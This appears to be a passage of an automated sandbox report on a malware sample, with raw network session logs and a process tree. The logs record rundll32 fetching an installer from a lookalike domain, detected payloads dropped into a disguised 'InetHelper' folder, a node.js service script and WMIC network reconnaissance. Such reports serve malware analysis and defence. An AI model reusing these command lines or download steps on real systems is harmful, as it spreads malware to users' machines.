                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
2024-05-01 09:08:18 UTC | 916 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                            Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                            Content-Length: 121628
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Server: sffe
                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 13:03:57 GMT
                                                                                                                                                                                                            Expires: Sat, 26 Apr 2025 13:03:57 GMT
                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                            Last-Modified: Mon, 15 Apr 2024 17:34:54 GMT
                                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Age: 417861
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Ascii: ct.seal)return!1;try{var l=Object.seal({}),m=Object.seal({}),n=new a([[l,2],[m,3]]);if(2!=n.get(l)||3!=n.get(m))return!1;n.delete(l);n.set(m,4);return!n.has(l)&&4==n.get(m)}catch(p){return!1}}())return a;var f="$jscomp_hidden_"+Math.random();e("freeze");
                                                                                                                                                                                                            2024-05-01 09:08:18 UTC1255INData Raw: 20 62 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 0a 66 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 3b 69 66 28 6b 29 7b 6b 3d 5f 2e 75 61 28 6b 29 3b 66 6f 72 28 76 61 72 20 6c 3b 21 28 6c 3d 6b 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6c 3d 6c 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6c 5b 30 5d 2c 6c 5b 31 5d 29 7d 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 2c 6c 29 7b 6b 3d 30 3d 3d 3d 6b 3f 30 3a 6b 3b 76 61 72 20 6d 3d 64 28 74 68 69 73 2c 6b 29 3b 6d 2e 6c 69 73 74 7c 7c 28 6d 2e 6c 69 73 74 3d 74 68 69 73 5b 30 5d 5b 6d 2e 69 64 5d 3d 5b 5d 29 3b 6d 2e 6e 66 3f 6d 2e 6e 66 2e 76 61 6c 75 65 3d 6c 3a 28 6d
                                                                                                                                                                                                            Data Ascii: b=new WeakMap,c=function(k){this[0]={};this[1]=f();this.size=0;if(k){k=_.ua(k);for(var l;!(l=k.next()).done;)l=l.value,this.set(l[0],l[1])}};c.prototype.set=function(k,l){k=0===k?0:k;var m=d(this,k);m.list||(m.list=this[0][m.id]=[]);m.nf?m.nf.value=l:(m
                                                                                                                                                                                                            2024-05-01 09:08:18 UTC1255INData Raw: 6d 3d 62 2e 67 65 74 28 6c 29 3a 28 6d 3d 22 22 2b 20 2b 2b 68 2c 62 2e 73 65 74 28 6c 2c 6d 29 29 3a 6d 3d 22 70 5f 22 2b 6c 3b 76 61 72 20 6e 3d 6b 5b 30 5d 5b 6d 5d 3b 69 66 28 6e 26 26 76 61 28 6b 5b 30 5d 2c 6d 29 29 66 6f 72 28 6b 3d 30 3b 6b 3c 6e 2e 6c 65 6e 67 74 68 3b 6b 2b 2b 29 7b 76 61 72 20 70 3d 6e 5b 6b 5d 3b 69 66 28 6c 21 3d 3d 6c 26 26 70 2e 6b 65 79 21 3d 3d 70 2e 6b 65 79 7c 7c 6c 3d 3d 3d 70 2e 6b 65 79 29 72 65 74 75 72 6e 7b 69 64 3a 6d 2c 6c 69 73 74 3a 6e 2c 69 6e 64 65 78 3a 6b 2c 6e 66 3a 70 7d 7d 72 65 74 75 72 6e 7b 69 64 3a 6d 2c 6c 69 73 74 3a 6e 2c 69 6e 64 65 78 3a 2d 31 2c 6e 66 3a 76 6f 69 64 20 30 7d 7d 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 2c 6c 29 7b 76 61 72 20 6d 3d 6b 5b 31 5d 3b 72 65 74 75 72 6e 20 70 61 28 66
                                                                                                                                                                                                            Data Ascii: m=b.get(l):(m=""+ ++h,b.set(l,m)):m="p_"+l;var n=k[0][m];if(n&&va(k[0],m))for(k=0;k<n.length;k++){var p=n[k];if(l!==l&&p.key!==p.key||l===p.key)return{id:m,list:n,index:k,nf:p}}return{id:m,list:n,index:-1,nf:void 0}},e=function(k,l){var m=k[1];return pa(f
                                                                                                                                                                                                            2024-05-01 09:08:18 UTC1255INData Raw: 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 65 74 75 72 6e 21 31 3b 66 3d 65 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 3d 3d 63 7c 7c 34 21 3d 66 2e 76 61 6c 75 65 5b 30 5d 2e 78 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 66 2e 76 61 6c 75 65 5b 30 5d 3f 21 31 3a 65 2e 6e 65 78 74 28 29 2e 64 6f 6e 65 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 21 31 7d 7d 28 29 29 72 65 74 75 72 6e 20 61 3b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 74 68 69 73 2e 44 61 3d 6e 65 77 20 4d 61 70 3b 69 66 28 63 29 7b 63 3d
                                                                                                                                                                                                            Data Ascii: urn!1;var e=d.entries(),f=e.next();if(f.done||f.value[0]!=c||f.value[1]!=c)return!1;f=e.next();return f.done||f.value[0]==c||4!=f.value[0].x||f.value[1]!=f.value[0]?!1:e.next().done}catch(h){return!1}}())return a;var b=function(c){this.Da=new Map;if(c){c=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49747 | 172.67.152.151 | 443 | 8344 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-01 09:08:19 UTC | 179 | OUT | GET /downloads/winapp/latest-installer.exe HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows) WinHTTP/Gecko Chrome/9999999
                                                                                                                                                                                                            Host: files.nflxso.ca
2024-05-01 09:08:19 UTC | 692 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:19 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 7055674
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            last-modified: Wed, 23 Nov 2022 20:15:22 GMT
                                                                                                                                                                                                            etag: "637e7f5a-6ba93a"
                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uBVPstCpCZEZx0R8fJq%2FXPP9N22sXYiJK%2BsyR%2Bndqt8V2UYnD6hTjsIkzxKu9ycBSna1hGwqmn33KzRmBRpop2QcYPKz9iirOzchuG4OqBSo9SznTjeTvn2JHy%2FEU17NuPk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 87cea0547f6d584e-IAD
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49749 | 23.221.242.90 | 443
Timestamp | Bytes transferred | Direction | Data
2024-05-01 09:08:24 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                            Host: fs.microsoft.com
2024-05-01 09:08:24 UTC | 754 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
X-CID: 7
X-CCC: US
X-Azure-Ref-OriginShield: Ref A: 8BFC17DD061B46CAAD2B2AEB7B19C3D8 Ref B: CH1AA2040901011 Ref C: 2023-07-21T06:04:00Z
X-MSEdge-Ref: Ref A: 1421F39FA7224BE199CC2F2C3DD24574 Ref B: CHI30EDGE0415 Ref C: 2023-07-21T06:04:00Z
Content-Type: application/octet-stream
X-Azure-Ref: 0DMGnYgAAAACXaXykPZuVRq4aV6pCkeO8U0pDRURHRTAzMTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
Cache-Control: public, max-age=165312
Date: Wed, 01 May 2024 09:08:24 GMT
Connection: close
X-CID: 2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49750 | 23.221.242.90 | 443 | |

Timestamp | Bytes transferred | Direction | Data
2024-05-01 09:08:24 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
Range: bytes=0-2147483646
User-Agent: Microsoft BITS/7.8
Host: fs.microsoft.com
2024-05-01 09:08:25 UTC | 774 | IN | HTTP/1.1 200 OK
Last-Modified: Tue, 16 May 2017 22:58:00 GMT
ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
ApiVersion: Distribute 1.1
Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
X-CID: 7
X-CCC: US
X-Azure-Ref-OriginShield: Ref A: 8BFC17DD061B46CAAD2B2AEB7B19C3D8 Ref B: CH1AA2040901011 Ref C: 2023-07-21T06:04:00Z
X-MSEdge-Ref: Ref A: 1421F39FA7224BE199CC2F2C3DD24574 Ref B: CHI30EDGE0415 Ref C: 2023-07-21T06:04:00Z
Content-Type: application/octet-stream
X-Azure-Ref: 0DMGnYgAAAACXaXykPZuVRq4aV6pCkeO8U0pDRURHRTAzMTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
Cache-Control: public, max-age=165311
Date: Wed, 01 May 2024 09:08:25 GMT
Content-Length: 55
Connection: close
X-CID: 2
2024-05-01 09:08:25 UTC | 55 | IN | Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49748 | 13.85.23.86 | 443 | |

Timestamp | Bytes transferred | Direction | Data
2024-05-01 09:08:24 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kPRasndGkvlenHk&MD=zHV46mV7 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Host: slscr.update.microsoft.com
2024-05-01 09:08:25 UTC | 560 | IN | HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/octet-stream
Expires: -1
Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
MS-CorrelationId: 11447ce3-14e3-4c41-8361-e1e388f1d3e5
MS-RequestId: 7ff7f84b-3ccb-473a-b50a-d1204e3c54a3
MS-CV: 4dBkJGHJZES/Pb4U.0
X-Microsoft-SLSClientCache: 2880
Content-Disposition: attachment; filename=environment.cab
X-Content-Type-Options: nosniff
Date: Wed, 01 May 2024 09:08:24 GMT
Connection: close
Content-Length: 24490


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49756 | 172.67.152.151 | 443 | 8660 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-01 09:08:28 UTC | 179 | OUT | GET /downloads/winapp/latest-installer.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows) WinHTTP/Gecko Chrome/9999999
Host: files.nflxso.ca
2024-05-01 09:08:28 UTC | 703 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 09:08:28 GMT
Content-Type: application/octet-stream
Content-Length: 7055674
Connection: close
last-modified: Wed, 23 Nov 2022 20:15:22 GMT
etag: "637e7f5a-6ba93a"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 22
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UyKE%2FgNExIOZKL9UkwziU%2F9nZo6ZojExcv8%2Bp%2FVgWJTPBbj5EkHZ0rBgpWeqa4xwIYckngSYktq9FIAc5zxNOj4rmvviLzWB7dhYuKvXYYcVzHHoOkdxdl%2F4BJljLlUSRjs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87cea08ede8820c9-IAD
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Ascii: @t4D$ Ph@S@SSD$$SPSt$(D$4D$@@j.;tVj%SSStVjL@uj=GtD$t$p@@V5 @tP@@tP@)jhM ^V5fCt$V6Yu^V5fCjtW6wh


Session ID:11
Source IP:192.168.2.4
Source Port:49760
Destination IP:13.85.23.86
Destination Port:443
PID:
Process:

Timestamp:2024-05-01 09:09:06 UTC
Bytes transferred:306
Direction:OUT
Data:
GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kPRasndGkvlenHk&MD=zHV46mV7 HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                            Host: slscr.update.microsoft.com

Timestamp:2024-05-01 09:09:07 UTC
Bytes transferred:560
Direction:IN
Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                            ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                                                                                                            MS-CorrelationId: a6d27169-6025-4d16-8a97-472432c4cdb5
                                                                                                                                                                                                            MS-RequestId: f8adda2f-0047-467e-afca-3c9c7180daf0
                                                                                                                                                                                                            MS-CV: 5DYQ+1zv8UKY0n2P.0
                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 2160
                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:09:06 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Content-Length: 25457



                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:11:08:03
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\Replace.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Replace.exe"
                                                                                                                                                                                                            Imagebase:0xbb0000
                                                                                                                                                                                                            File size:36'540'866 bytes
                                                                                                                                                                                                            MD5 hash:FD5CD14325C51ECAB6A57D1D665F8852
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                            Start time:11:08:03
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:rundll32 "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
                                                                                                                                                                                                            Imagebase:0x7e0000
                                                                                                                                                                                                            File size:61'440 bytes
                                                                                                                                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                            Start time:11:08:07
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:.\run.exe
                                                                                                                                                                                                            Imagebase:0x7ff75fb90000
                                                                                                                                                                                                            File size:36'542'497 bytes
                                                                                                                                                                                                            MD5 hash:D77C3EF3EFA7E38EF91137466EEE801B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 9%, ReversingLabs
                                                                                                                                                                                                            • Detection: 7%, Virustotal, Browse
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                            Start time:11:08:08
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                            Start time:11:08:09
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2272,i,3908760233601738939,4589788007160690134,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

Target ID:6
Start time:11:08:16
Start date:01/05/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Imagebase:0x7ff6da410000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:11:08:16
Start date:01/05/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Imagebase:0x7e0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:11:08:25
Start date:01/05/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Imagebase:0x7ff6da410000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:11:08:26
Start date:01/05/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Imagebase:0x7e0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:11:08:48
Start date:01/05/2024
Path:C:\Users\user\AppData\Local\Temp\wnsA071.tmp
Wow64 process (32bit):true
Commandline:wscsu.exe /S /VERPOSTFIX=bt
Imagebase:0x400000
File size:7'055'674 bytes
MD5 hash:7A506A2E92BC66A9F64C2333A815E97A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 83%, ReversingLabs
• Detection: 77%, Virustotal, Browse
Reputation:low
Has exited:true

Target ID:14
Start time:11:08:51
Start date:01/05/2024
Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
Imagebase:0xed0000
File size:4'096 bytes
MD5 hash:E9DED10DFF258F6522FE9079ED3319CA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 88%, ReversingLabs
• Detection: 73%, Virustotal, Browse
Reputation:low
Has exited:true

Target ID:15
Start time:11:08:51
Start date:01/05/2024
Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Imagebase:0x400000
File size:6'887'560 bytes
MD5 hash:5F40521D2E1082FE1C734610C4A83911
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
• Detection: 0%, Virustotal, Browse
Reputation:low
Has exited:false

Target ID:16
Start time:11:08:52
Start date:01/05/2024
Path:C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):true
Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Imagebase:0xc40000
File size:427'008 bytes
MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:17
Start time:11:08:52
Start date:01/05/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:18
Start time:11:08:56
Start date:01/05/2024
Path:C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):true
Commandline:wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
Imagebase:0xc40000
File size:427'008 bytes
MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                            Start time:11:08:56
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                            Start time:11:08:57
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wscsu.exe /S /VERPOSTFIX=bt
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:7'055'674 bytes
                                                                                                                                                                                                            MD5 hash:7A506A2E92BC66A9F64C2333A815E97A
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            • Detection: 83%, ReversingLabs
                                                                                                                                                                                                            • Detection: 77%, Virustotal
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                            Start time:11:08:57
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" St0P
                                                                                                                                                                                                            Imagebase:0xed0000
                                                                                                                                                                                                            File size:4'096 bytes
                                                                                                                                                                                                            MD5 hash:E9DED10DFF258F6522FE9079ED3319CA
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                            Start time:11:09:00
                                                                                                                                                                                                            Start date:01/05/2024
